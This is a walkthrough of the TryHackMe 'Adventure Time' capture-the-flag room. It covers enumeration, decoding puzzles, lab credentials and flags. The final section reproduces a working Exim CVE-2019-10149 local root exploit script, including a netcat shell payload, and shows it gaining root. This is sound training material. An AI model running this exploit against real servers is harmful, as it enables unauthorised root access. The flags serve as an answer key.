ADVENTURE TIME

https://tryhackme.com/room/adventuretime

Walkthrough for "Adventure Time"

Operating System: Linux

Recon

nmap-auto $TARGET all

PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 3.0.3
|  Logged in as ftp
|      TYPE: ASCII
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.29
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: You found Finn
| ssl-cert: Subject: commonName=adventure-time.com/organizationName=Candy Corporate Inc./stateOrProvinceName=Candy Kingdom/countryName=CK
31337/tcp open  Elite ***
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP has anonymous login which could provide some material, and there are two web services as well as a common name. Add that common name to the /etc/hosts file and it's off to enumeration.

Enumeration

[FTP]

There were 6 images in the ftp server when logged in as "anonymous" or "ftp".

exiftool *.jpg | grep "XP Comment" | cut -d: -f2

 01111001 01101111 01110101 00100000
 01110010 01100101 01100001 01101100 01101100 01111001 00100000
 01101100 01101001 01101011 01100101 00100000
 01110100 01101111 00100000
 01110000 01110101 01111010 01111010 01101100 01100101 00100000
 01100100 01101111 01101110 00100111 01110100 00100000 01111001 01100001

This translated to "you really like to puzzle don't ya" when using a binary to ascii converter. Probably just a troll message, still fun to do!

[Web]

Navigating to https://adventure-time.com/ shows a picture of Finn saying "I've lost Jake, can you help me find him." The source code shows that the alt text for the image says "the magic word". Viewing the SSL certificate shows the following: Email Address: bubblegum@land-of-ooo.com

Let's modify /etc/hosts to include both "adventure-time.com" and "land-of-ooo.com".

Navigating to https://land-of-ooo.com/ shows a picture of Jake saying "You found Finn!! Now we still need to find the resetcode for BMO. I think it's on B's laptop."

I tried playing around with the service on 31337, but couldn't guess the "magic word" (it wasn't "the magic word"). I decided to do a directory search using gobuster to enumerate the sites further and found the following:

# dirbust https://adventure-time.com/ --no-tls-validation
candybar             (Status: 301) [Size: 329]

# dirbust https://land-of-ooo.com/ --no-tls-validation
/yellowdog            (Status: 301) [Size: 322]

Navigating to - shows the following encoded string. It's also written in the source code as a comment so I don't have to type it out and just copy/paste.

I knew it was some form of base encoded string and eventually found it to be Base32 encoded. Unfortunately the clue it gave was something I already checked when going to the site which is Princess Bubblegum's email.

Navigating to https://land-of-ooo.com/yellowdog/ shows the following image of Jake. The source code has the alt text "what is the password?" but doesn't provide much past that.

Doing yet another directory search on the current page leads to another subdirectory at https://land-of-ooo.com/yellowdog/bananastock/ which looks like some puzzle code similar to morse code.

Luckily the source code of the page contains the raw text:

 <!-- _/..../.\_.../._/_./._/_./._/...\._/._./.\_/..../.\_..././.../_/_._.__/_._.__/_._.__ -->

Recognizing this as morese code, I went back to CyberChef and decoded it using the letter delimiter be a forward slash and the word delimiter be a backslash. The output showed "THE BANANAS ARE THE BEST!!!" which should be the password for the banana guard.

Trying out the new password as the magic word did not work. Seeing as directory fuzzing has always been the answer, I decided to do it again and not surprisingly, got another subdirectory at https://land-of-ooo.com/yellowdog/bananastock/princess/. That's a lot of time waiting on directory searching.

Reading the comment by PB made me think I would need to directory fuzz again, but thankfully opening the source code showed the following:

<!DOCTYPE html>
<html>
<head>
<title>What secret safe?</title>
</head>
<body>
    <div id="container" align="center">
        <img src="bubble1.png" alt="where can it be?" style="width: 100%"> 
    </div>

    <!--
    Secrettext = 0008f1a92d287b48dccb5079eac18ad2a0c59c22fbc7827295842f670cdb3cb645de3de794320af132ab341fe0d667a85368d0df5a3b731122ef97299acc3849cc9d8aac8c3acb647483103b5ee44166
    Key = my cool password
    IV = abcdefghijklmanopqrstuvwxyz
    Mode = CBC
    Input = hex
    Output = raw
    -->

</body>
</html> 

Seeing the presence of an IV and CBC mode, I figured this to be AES. CyberChef has a recipe for "AES Decrypt", so I can go back there to decrypt the secret text.

Awesome, now in plain text, I can see the magic word which is: ricardio. Using the magic word service on port 31337 with nc 10.64.153.6 31337 then gives the following information "The new username is: apple-guards".

Credentials: apple-guards ::: THE BANANAS ARE THE BEST!!!

The first flag is then found at /home/apple-guards/flag1.

flag1: tryhackme{Th1s1sJustTh3St4rt}

Lateral Movement

So it's actually possible to privilege escalate from here due to a vulnerability in exim 4.90.1 shown here https://ine.com/blog/the-return-of-the-wizard-rce-in-exim-cve-201910149. Since exim4 is a SUID binary, it can be used to get root and skip the rest of the challenge. I'll include that method at the bottom in Privilige Escalation.

In the apple-guards home directory, there is also an email containing some valuable information stating that Marceline has hidden a file on the box for better access:

apple-guards@at:~$ cat mbox
From marceline@at  Fri Sep 20 16:39:54 2019
Return-Path: <marceline@at>
X-Original-To: apple-guards@at
Delivered-To: apple-guards@at
Received: by at.localdomain (Postfix, from userid 1004)
	id 6737B24261C; Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
Subject: Need help???
To: <apple-guards@at>
X-Mailer: mail (GNU Mailutils 3.4)
Message-Id: <20190920143954.6737B24261C@at.localdomain>
Date: Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
From: marceline@at

Hi there bananaheads!!!
I heard Princess B revoked your access to the system. Bummer!
But I'll help you guys out.....doesn't cost you a thing.....well almost nothing.

I hid a file for you guys. If you get the answer right, you'll get better access.
Good luck!!!!

First I wanted to confirm the users on the box, and printing /etc/passwd and looking at the non service users showed the following confirming that Marceline is a user:

• root

• finn

• jake

• bubblegum

• marceline

• peppermint-butler

• gunter

• fern

• apple-guards

Using a find command to search for files owned by marceline gave the following:

apple-guards@at:~$ find / -user marceline 2>/dev/null
/etc/fonts/helper
/home/marceline

Well, thats not normal, the home directory, yes, but the fonts helper file, definitely suspicious. Checking the file shows it's an ELF 64-bit executable. Running it shows an interactive session stating "The key to solve this puzzle is gone . And you need the key to get this readable: Gpnhkse". Single key ciphers are actually not too complicated. Since there was no encoding going on and it lacked the presence of numbers, I knew it was a substition or vignere encoded string. Using CyberChef, I tried the most obvious choice of a key, the string "gone", and I was blessed with the decoding of the encoded text giving the string "Abadeer".

======================================
      BananaHead Access Pass          
       created by Marceline           
======================================

Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha

Ready for the question?

The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse

Did you solve the puzzle? yes

What is the word I'm looking for? Abadeer

That's it!!!! You solved my puzzle
Don't tell princess B I helped you guys!!!
My password is 'My friend Finn'

Credentials: marceline ::: My friend Finn

Using the switch user command allowed me to switch to the marceline user. The second flag is then found in her home directory at /home/marceline/flag2.

flag2: tryhackme{N1c30n3Sp0rt}

Lateral Movement 2

Also in her home directory is the file I-got-a-secret.txt which contains the following:

marceline@at:~$ cat I-got-a-secret.txt 
Hello Finn,

I heard that you pulled a fast one over the banana guards.
B was very upset hahahahaha.
I also heard you guys are looking for BMO's resetcode.
You guys broke him again with those silly games?

You know I like you Finn, but I don't want to anger B too much.
So I will help you a little bit...

But you have to solve my little puzzle. Think you're up for it?
Hahahahaha....I know you are.

111111111100100010101011101011111110101111111111011011011011000001101001001011111111111111001010010111100101000000000000101001101111001010010010111111110010100000000000000000000000000000000000000010101111110010101100101000000000000000000000101001101100101001001011111111111111111111001010000000000000000000000000001010111001010000000000000000000000000000000000000000000001010011011001010010010111111111111111111111001010000000000000000000000000000000001010111111001010011011001010010111111111111100101001000000000000101001111110010100110010100100100000000000000000000010101110010100010100000000000000010100000000010101111100101001111001010011001010010000001010010100101011100101001101100101001011100101001010010100110110010101111111111111111111111111111111110010100100100000000000010100010100111110010100000000000000000000000010100111111111111111110010100101111001010000000000000001010

Another puzzle that looks like binary code. Trying a binary decoder produced gibberish, got it, that's not it. By using the hint provided on the challenge page "If stuck do research on cutlery", I was able to use my googling skills to discover this is an esoteric language like BrainF$&k that uses 1's and 0's called "spoon". Why this was used, I have no idea, but it didn't take long to find a useful decoder to handle it.

The output is "The magic word you are looking for is ApplePie". Great, another magic word for BG. Using the service again with the new magic word has BG give the password of peppermint-butler which is "That Black Magic".

Credentials: peppermint-butler ::: That Black Magic

The third flag is located at the path /home/peppermint-butler/flag3.

flag3: tryhackme{N0Bl4ckM4g1cH3r3}

Lateral Movement 3

The only thing in the butler's folder is a picture which I downloaded to my attack box using scp peppermint-butler@10.64.146.248:butler-1.jpg . , opening it shows the following:

Very suspicious to say that nothing is there. There's really nothing else to note in the folder and I still have no sudo capabilities with this user. The exiftool doesn't show anything noteworthy either in the picture's metadata. Trying to use steghide or stegseek to reveal hidden data didn't work, at least not without a password.

After a while trying this and that with all the photos I had collected, I realized ser marceline had some hidden files elsewhere, so I decided to search to see if the same could be said for peppermint-butler with the command:

peppermint-butler@at:~$ find / -type f -user peppermint-butler 2>/dev/null
/usr/share/xml/steg.txt
/etc/php/zip.txt
/home/peppermint-butler/.bashrc
/home/peppermint-butler/.bash_history
/home/peppermint-butler/.profile
/home/peppermint-butler/flag3
/home/peppermint-butler/.cache/motd.legal-displayed
/home/peppermint-butler/.bash_logout
/home/peppermint-butler/butler-1.jpg

A file named "steg.txt", clearly an indicator of steganography. Reading the file revealed the password of the butler's secret file "ToKeepASecretSafe". Using it along with steghide revealed a zip filed called secrets.zip. There was also a file named "zip.txt" which revealed the password to the zip file which is "ThisIsReallySave".

The output of "secrets.txt":

[0200 hours][upper stairs]
I was looking for my arch nemesis Peace Master, 
but instead I saw that cowering little puppet from the Ice King.....gunter.
What was he up to, I don't know.
But I saw him sneaking in the secret lab of Princess Bubblegum.
To be able to see what he was doing I used my spell 'the evil eye' and saw him.
He was hacking the secret laptop with something small like a duck of rubber.
I had to look closely, but I think I saw him type in something.
It was unclear, but it was something like 'The Ice King s????'.
The last 4 letters where a blur.

Should I tell princess Bubblegum or see how this all plays out?
I don't know....... 

Great, gunter is one of the last user's I haven't touched yet. Trying out a few things, I eventually figured out the password: "The Ice King sucks". This could also be done easily through brute force using hydra.

Credentials: gunter ::: The Ice King sucks

The fourth flag is located at /home/gunter/flag4.

flag4: tryhackme{P1ngu1nsRul3!}

Privilige Escalation

I actually did this before all the lateral movements.

So once on the box, I searched for SUID binaries using find / -perm -4000 which showed /usr/sbin/exim4. I can view the settings for exim4 in its configuration file through the following:

apple-guards@at:/tmp$ cat /etc/exim4/update-exim4.conf.conf 
# /etc/exim4/update-exim4.conf.conf
## ...
# This is a Debian specific file

dc_eximconfig_configtype='local'
dc_other_hostnames='at'
dc_local_interfaces='127.0.0.1.60000'
dc_readhost=''
dc_relay_domains=''
dc_minimaldns='false'
dc_relay_nets=''
dc_smarthost=''
CFILEMODE='644'
dc_use_split_config='false'
dc_hide_mailname=''
dc_mailname_in_oh='true'
dc_localdelivery='mail_spool'

Most importantly, I can see exim4 is running on port 60,000. Using "searchsploit", I found an exploit that works locally for that included version as well:

# searchsploit -p 46974   
  Exploit: Exim 4.87 < 4.91 - (Local / Remote) Command Execution
      URL: https://www.exploit-db.com/exploits/46974
     Path: /usr/share/exploitdb/exploits/linux/remote/46974.txt
    Codes: CVE-2019-10149
 Verified: False
File Type: ASCII text
Copied EDB-ID #46974's path to the clipboard

The security post https://ine.com/blog/the-return-of-the-wizard-rce-in-exim-cve-201910149 contains a local privilege escalation script. The main thing that needs to be changed is the default port for exim4 from port 25 to port 60000. I also noticed that the gcc build will fail because the base user isn't allowed to run gcc, so I let it default to the cp and then ran the SUID /bin/bash with the -p symbol for privileged shell (user gunter has the ability to run gcc). Here is the script:

#!/bin/bash
#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fbash\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
# usage instructions
function usage()
{
 echo "$0 [-m METHOD]"
 echo
 echo "-m setuid : use the setuid payload (default)"
 echo "-m netcat : use the netcat payload"
 echo
 exit 1
}
# payload delivery
function exploit()
{
 # connect to localhost:60000 CHANGED
 exec 3<>/dev/tcp/localhost/60000
 # deliver the payload
 read -u 3 && echo $REPLY
 echo "helo localhost" >&3
 read -u 3 && echo $REPLY
 echo "mail from:<>" >&3
 read -u 3 && echo $REPLY
 echo "rcpt to:<$PAYLOAD>" >&3
 read -u 3 && echo $REPLY
 echo "data" >&3
 read -u 3 && echo $REPLY
 for i in {1..31}
 do
   echo "Received: $i" >&3
 done
 echo "." >&3
 read -u 3 && echo $REPLY
 echo "quit" >&3
 read -u 3 && echo $REPLY
}
# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo
# parse command line
while [ ! -z "$1" ]; do
 case $1 in
   -m) shift; METHOD="$1"; shift;;
   * ) usage
   ;;
 esac
done
if [ -z $METHOD ]; then
 usage
fi
# setuid method
if [ $METHOD = "setuid" ]; then
 # prepare a setuid shell helper to circumvent bash checks
 echo "Preparing setuid shell helper..."
 echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" >/tmp/pwned.c
 gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
 if [ $? -ne 0 ]; then
   echo "Problems compiling setuid shell helper, check your gcc."
   echo "Falling back to the /bin/bash method."
   cp /bin/bash /tmp/pwned
 fi
 echo
 # select and deliver the payload
 echo "Delivering $METHOD payload..."
 PAYLOAD=$PAYLOAD_SETUID
 exploit
 echo
 # wait for the magic to happen and spawn our shell
 echo "Waiting 5 seconds..."
 sleep 5
 ls -l /tmp/pwned
 /tmp/pwned -p
# netcat method
elif [ $METHOD = "netcat" ]; then
 # select and deliver the payload
 echo "Delivering $METHOD payload..."
 PAYLOAD=$PAYLOAD_NETCAT
 exploit
 echo
 # wait for the magic to happen and spawn our shell
 echo "Waiting 5 seconds..."
 sleep 5
 nc -v 127.0.0.1 31337
# print help
else
 usage
fi

The outcome looks like the following:

apple-guards@at:/tmp$ ./wiz

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/bash method.

Delivering setuid payload...
220 at ESMTP Exim 4.90_1 Ubuntu Wed, 10 Dec 2025 04:41:24 +0100
250 at Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vTB4u-0000Uo-HG
221 at closing connection

Waiting 5 seconds...
-rwsr-xr-x 1 root apple-guards 1113504 dec 10 04:41 /tmp/pwned
pwned-4.4# id
uid=1009(apple-guards) gid=1009(apple-guards) euid=0(root) groups=1009(apple-guards)
pwned-4.4# whoami
root

flag5: tryhackme{Th1s1s4c0d3F0rBM0}